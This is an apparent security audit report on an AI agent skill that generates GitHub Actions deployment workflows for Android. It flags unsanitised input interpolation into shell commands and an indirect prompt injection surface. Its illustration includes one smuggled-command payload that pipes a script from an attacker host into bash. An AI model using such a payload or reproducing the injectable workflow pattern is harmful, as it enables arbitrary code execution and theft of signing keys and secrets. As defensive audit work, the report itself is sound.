android-workflow-production
Pass
Audited by Gen Agent Trust Hub on Feb 28, 2026
Risk Level: SAFE COMMAND_EXECUTION PROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The generated GitHub Actions workflows (`deploy-production.yml` and `manage-rollout.yml`) directly interpolate user-provided inputs into shell commands, creating a command injection vulnerability.
  - Evidence: `run: bundle exec fastlane deploy_production rollout:${{ github.event.inputs.rollout_percentage }}` in `.github/workflows/deploy-production.yml`.
  - Evidence: `run: bundle exec fastlane increase_rollout rollout:${{ github.event.inputs.percentage }}` in `.github/workflows/manage-rollout.yml`.
  - Risk: An attacker with permissions to trigger manual workflows could execute arbitrary code on the runner by providing malicious input such as `1.0; curl http://attacker.com/exploit.sh | bash`.
- [PROMPT_INJECTION]: The skill exhibits an indirect prompt injection surface by generating automation code that fails to sanitize external data entering the agent's execution context.
  - Ingestion points: `github.event.inputs.rollout_percentage` and `github.event.inputs.percentage` fields within the generated YAML workflows.
  - Boundary markers: Absent. The inputs are not enclosed in delimiters or validated against a strict regex/schema before use.
  - Capability inventory: The generated workflows have the capability to execute shell commands via `bundle exec`, access repository secrets (including signing keys and service accounts), and interact with the GitHub API.
  - Sanitization: Absent. The skill provides no logic to escape or validate the input strings before they are executed in a shell context.
Audit Metadata